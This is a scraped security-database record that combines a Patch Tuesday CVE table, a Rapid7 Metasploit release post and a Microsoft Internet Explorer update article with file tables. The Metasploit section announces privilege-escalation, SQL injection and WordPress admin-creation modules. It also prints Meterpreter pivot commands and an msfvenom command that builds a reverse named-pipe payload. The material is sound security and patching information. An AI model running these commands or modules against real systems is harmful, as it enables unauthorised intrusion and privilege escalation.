\n[CVE-2021-40476](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40476>) | Windows AppContainer Elevation Of Privilege Vulnerability | No | No | 7.5 | No \n[CVE-2021-40456](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40456>) | Windows AD FS Security Feature Bypass Vulnerability | No | No | 5.3 | Yes \n[CVE-2021-40450](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40450>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41357>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40478](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40478>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40488](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40488>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-26441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26441>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41345>) | Storage Spaces Controller Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41330](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41330>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-41339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41339>) | Microsoft DWM Core Library Elevation of Privilege Vulnerability | No | No | 4.7 | No \n[CVE-2021-40470](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40470>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41346>) | Console Window Host Security Feature Bypass Vulnerability | No | No | 5.3 | No \n[CVE-2021-41337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41337>) | Active Directory Security Feature Bypass Vulnerability | No | No | 4.9 | Yes \n[CVE-2021-41361](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41361>) | Active Directory Federation Server Spoofing Vulnerability | No | No | 5.4 | Yes", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2021-10-12T19:47:16", "type": "rapid7blog", "title": "Patch Tuesday - October 2021", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1971", "CVE-2021-26427", "CVE-2021-26441", "CVE-2021-26442", "CVE-2021-34453", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-36953", "CVE-2021-36970", "CVE-2021-37974", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-37977", "CVE-2021-37978", "CVE-2021-37979", "CVE-2021-37980", "CVE-2021-38662", "CVE-2021-38663", "CVE-2021-38672", "CVE-2021-40443", "CVE-2021-40449", "CVE-2021-40450", "CVE-2021-40454", "CVE-2021-40455", "CVE-2021-40456", "CVE-2021-40457", "CVE-2021-40460", "CVE-2021-40461", "CVE-2021-40462", "CVE-2021-40463", "CVE-2021-40464", "CVE-2021-40465", "CVE-2021-40466", "CVE-2021-40467", "CVE-2021-40468", "CVE-2021-40469", "CVE-2021-40470", "CVE-2021-40471", "CVE-2021-40472", "CVE-2021-40473", "CVE-2021-40474", "CVE-2021-40475", "CVE-2021-40476", "CVE-2021-40477", "CVE-2021-40478", "CVE-2021-40479", "CVE-2021-40480", "CVE-2021-40481", "CVE-2021-40482", "CVE-2021-40483", "CVE-2021-40484", "CVE-2021-40485", "CVE-2021-40486", "CVE-2021-40487", "CVE-2021-40488", "CVE-2021-40489", "CVE-2021-41330", "CVE-2021-41331", "CVE-2021-41332", "CVE-2021-41334", "CVE-2021-41335", "CVE-2021-41336", "CVE-2021-41337", "CVE-2021-41338", "CVE-2021-41339", "CVE-2021-41340", "CVE-2021-41342", "CVE-2021-41343", "CVE-2021-41344", "CVE-2021-41345", "CVE-2021-41346", "CVE-2021-41347", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41352", "CVE-2021-41353", "CVE-2021-41354", "CVE-2021-41355", "CVE-2021-41357", "CVE-2021-41361", "CVE-2021-41363"], "modified": "2021-10-12T19:47:16", "id": "RAPID7BLOG:73EAE8A2825E9B6764F314122B4E5F25", "href": "https://blog.rapid7.com/2021/10/12/patch-tuesday-october-2021/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T17:07:12", "description": "## Callback Hell\n\n\n\nMetasploit has now added an exploit module for [CVE-2021-40449](<https://attackerkb.com/topics/1YJ3p8CEZz/cve-2021-40449?referrer=blog>), a Windows local privilege escalation exploit caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys. This module can be used to escalate privileges to those of `NT AUTHORITY\\SYSTEM`. The module should work against Windows 10 x64 build 14393 and 17763, but it should also work against older versions of Windows 10. Note that this exploit may not always work the first time, and may require an additional run to succeed.\n\n## OMIGOD it\u2019s LPE\n\nAs a continuation to the recently landed [OMIGOD RCE module](<https://www.rapid7.com/blog/post/2021/10/29/metasploit-wrap-up-136/>), [Spencer McIntyre](<https://github.com/zeroSteiner>) has contributed a new local privilege escalation module for [CVE-2021-38648](<https://attackerkb.com/topics/VrYz48szMN/cve-2021-38648?referrer=blog>), which is an authentication bypass within Microsoft's (OMI) management interface versions less than `1.6.8-1`. This vulnerability must be leveraged locally and can be exploited in the default configuration. Exploitation results in OS command execution as the root user.\n\n## Named Pipe Pivoting\n\nThis week [dwelch-r7](<https://github.com/dwelch-r7>) fixed a regression issue in Meterpreter's named pipe pivoting support. This relatively unknown feature was initially added by community contributor [OJ](<https://github.com/OJ>) and allows users to pivot additional Meterpreter sessions through a compromised host using named pipes over SMB.\n\nAs a quick demonstration, users can create a named pipe on a compromised Windows host through an existing Meterpreter session:\n \n \n sessions -i -1\n pivot add -t pipe -l $smb_host_ip -n mypipe -a x64 -p windows\n \n\nThen verify the pivot was created successfully:\n \n \n meterpreter > pivot list\n \n Currently active pivot listeners\n ================================\n \n Id URL Stage\n -- --- -----\n c134bb9f27dc4089b2f56b3ad25c4970 pipe://192.168.222.155/mypipe x64/windows\n \n\nNow generate a new payload which will connect to the compromised host\u2019s named pivot over SMB:\n \n \n msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=$smb_host_ip PIPENAME=mypipe -o pipe.exe -f exe -a x64\n \n\nExecution of this new payload will attempt to connect to the compromised Windows host, resulting in a new session in msfconsole, which can be verified with the `sessions` command:\n\n\n\n## New module content (4)\n\n * [WordPress Plugin Automatic Config Change to RCE](<https://github.com/rapid7/metasploit-framework/pull/15776>) by Jerome Bruandet and h00die - This adds an auxiliary module that leverages an unauthenticated arbitrary Wordpress options change vulnerability \nin the Automatic (wp-automatic) plugin version 3.53.2 and below. The module enables user registration, sets the default user role to admin and creates a new privileged user with the provided email address.\n * [BillQuick Web Suite txtID SQLi](<https://github.com/rapid7/metasploit-framework/pull/15806>) by Caleb Stewart and h00die, which exploits [CVE-2021-42258](<https://attackerkb.com/topics/EaOJXhyB2v/cve-2021-42258?referrer=blog>) \\- This adds an auxiliary module that exploits an unauthenticated sql injection vulnerability in BillQuick Web Suite versions before `v22.0.9.1`.\n * [Microsoft OMI Management Interface Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15802>) by Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits [CVE-2021-38648](<https://attackerkb.com/topics/VrYz48szMN/cve-2021-38648?referrer=blog>) \\- This adds a local exploit module that targets versions less than `1.6.8-1` of Microsoft's Open Management Infrastructure (OMI) software. Issuing a command execution request against the local socket with the authentication handshake omitted can result in code execution as the `root` user.\n * [Win32k NtGdiResetDC Use After Free Local Privilege Elevation](<https://github.com/rapid7/metasploit-framework/pull/15834>) by Boris Larin, Costin Raiu, Grant Willcox, IronHusky, KaLendsi, Red Raindrop Team of Qi'anxin Threat Intelligence Center, and ly4k, which exploits [CVE-2021-40449](<https://attackerkb.com/topics/1YJ3p8CEZz/cve-2021-40449?referrer=blog>) \\- Adds a module for CVE-2021-40449 aka CallbackHell, a Windows local privilege escalation exploit caused by a use after free during the NtGdiResetDC callback in vulnerable versions of win32k.sys.\n\n## Enhancements and features\n\n * [#15829](<https://github.com/rapid7/metasploit-framework/pull/15829>) from [AlanFoster](<https://github.com/AlanFoster>) \\- This makes a couple of improvements to the Kubernetes Exec module to handle slow instances more gracefully by using a configurable exponential back off.\n * [#15840](<https://github.com/rapid7/metasploit-framework/pull/15840>) from [smashery](<https://github.com/smashery>) \\- Changes an error message that was preventing the DCSync operation from running as SYSTEM to a warning to allow it to run. This fixes a case where the computer account has the necessary privileges to complete the operations which is the case when it is a domain controller.\n * [#15846](<https://github.com/rapid7/metasploit-framework/pull/15846>) from [smashery](<https://github.com/smashery>) \\- The `download` command has been updated so that now supports tab completion for file paths and file names.\n * [#15859](<https://github.com/rapid7/metasploit-framework/pull/15859>) from [smashery](<https://github.com/smashery>) \\- Improves the Meterpreter tab completion functionality on case insensitive filesystems (such as Windows).\n\n## Bugs fixed\n\n * [#15818](<https://github.com/rapid7/metasploit-framework/pull/15818>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Fixes an edgecase in the Kubernetes exec module which led to sessions dying when performing partial websocket reads\n\n * [#15820](<https://github.com/rapid7/metasploit-framework/pull/15820>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Fixes a regression issue in Meterpreter's named pipe pivoting support\n\n * [#15838](<https://github.com/rapid7/metasploit-framework/pull/15838>) from [uhei](<https://github.com/uhei>) \\- Fixes a regression error in `auxiliary/scanner/sap/sap_router_portscanner` which caused this module to crash when validating host ranges\n\n * [#15845](<https://github.com/rapid7/metasploit-framework/pull/15845>) from [smashery](<https://github.com/smashery>) \\- This updates Meterpreter to check if it's running as SYSTEM before attempting to escalate as part of `getsystem`. This allows it to state that it's already running as SYSTEM instead of displaying an error message that no escalation technique worked.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.13...6.1.14](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-11-04T08%3A10%3A58-05%3A00..2021-11-11T11%3A51%3A19-06%3A00%22>)\n * [Full diff 6.1.13...6.1.14](<https://github.com/rapid7/metasploit-framework/compare/6.1.13...6.1.14>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T15:36:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38648", "CVE-2021-40449", "CVE-2021-42258"], "modified": "2021-11-12T15:36:09", "id": "RAPID7BLOG:7805FE8CEF45482B462D2B4F7A9F7F75", "href": "https://blog.rapid7.com/2021/11/12/metasploit-wrap-up-138/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2022-08-10T14:17:21", "description": "None\n## **Summary**\n\nThis security update resolves vulnerabilities in Internet Explorer. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures](<https://portal.msrc.microsoft.com/security-guidance>). Additionally, see the following articles for more information about cumulative updates:\n\n * [Windows Server 2008 SP2 update history](<https://support.microsoft.com/help/4343218>)\n * [Windows 7 SP1 and Windows Server 2008 R2 SP1 update history](<https://support.microsoft.com/help/4009469>)\n * [Windows Server 2012 update history](<https://support.microsoft.com/help/4009471>)\n * [Windows 8.1 and Windows Server 2012 R2 update history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The October 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following:\n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the October 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from October 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the October 2021 Security Only Quality Update, and the October 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n\n**Important: **You must restart your device after you install these required updates.\n\n**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5006671>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.\n\n**Note: **The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n## \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.20120| 11-Sep-2021| 19:22| 100,352 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20139| 13-Sep-2021| 20:23| 1,342,976 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:44| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 68,096 